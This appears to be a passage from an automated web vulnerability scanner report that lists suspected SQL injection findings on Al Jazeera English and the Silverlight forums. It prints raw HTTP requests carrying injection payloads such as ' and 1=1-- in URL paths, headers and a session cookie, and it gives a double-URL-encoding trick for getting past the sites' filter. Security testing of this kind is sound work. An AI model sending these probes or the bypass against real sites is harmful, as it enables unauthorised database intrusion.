Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:53:23 GMT
Expires: Sun, 30 Jan 2011 14:53:23 GMT
Date: Sun, 30 Jan 2011 14:53:23 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4mzuhv45dkuuyh45qjoteg55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:53:09 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast'%20and%201%3d2--%20/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:53:14 GMT
Date: Sun, 30 Jan 2011 14:53:14 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 9
X-Cache: HIT from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.11. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://english.aljazeera.net
Path:	/news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast/2011'%20and%201%3d1--%20/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:54:23 GMT
Expires: Sun, 30 Jan 2011 14:54:23 GMT
Date: Sun, 30 Jan 2011 14:58:06 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zm2lsi45ohofqt55b5zofc25; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:01 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast/2011'%20and%201%3d2--%20/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:54:13 GMT
Date: Sun, 30 Jan 2011 14:57:56 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 11
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.12. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://english.aljazeera.net
Path:	/news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast/2011/01'%20and%201%3d1--%20/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:55:14 GMT
Expires: Sun, 30 Jan 2011 14:55:14 GMT
Date: Sun, 30 Jan 2011 14:58:57 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xpdobtjno12jtunglmaon455; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:50 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast/2011/01'%20and%201%3d2--%20/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:55:13 GMT
Date: Sun, 30 Jan 2011 14:58:56 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 2
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.13. http://forums.silverlight.net/forums/topicsactive.aspx [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://forums.silverlight.net
Path:	/forums/topicsactive.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73344
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:49 GMT; expires=Mon, 30-Jan-2012 15:39:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:39:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<a href="/members/abeaulieu.aspx" title="abeaulieu" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="abeaulieu" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/abeaulieu.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/clintong.aspx" title="clintong" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="clintong" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/clintong.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/swo.aspx" title="swo" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="swo" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/swo.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>

...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73401
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:50 GMT; expires=Mon, 30-Jan-2012 15:39:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:39:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<a href="/members/Gaz3ll.aspx" title="Gaz3ll" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="Gaz3ll" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/Gaz3ll.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/queequac.aspx" title="queequac" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="queequac" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/queequac.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/atti.aspx" title="atti" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="atti" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/atti.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>

...[SNIP]...

1.14. http://forums.silverlight.net/user/viewonline.aspx [ASP.NET_SessionId cookie] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ASP.NET_SessionId cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv';

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 104849
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:11:00 GMT; expires=Mon, 30-Jan-2012 16:11:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=se2isf55pdj1fz45lo4mp3no; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:31:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:10:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.15. http://forums.silverlight.net/user/viewonline.aspx [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload 12539998'%20or%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 134518
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:13:12 GMT; expires=Mon, 30-Jan-2012 16:13:12 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:33:12 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:13:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.16. http://forums.silverlight.net/user/viewonline.aspx [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
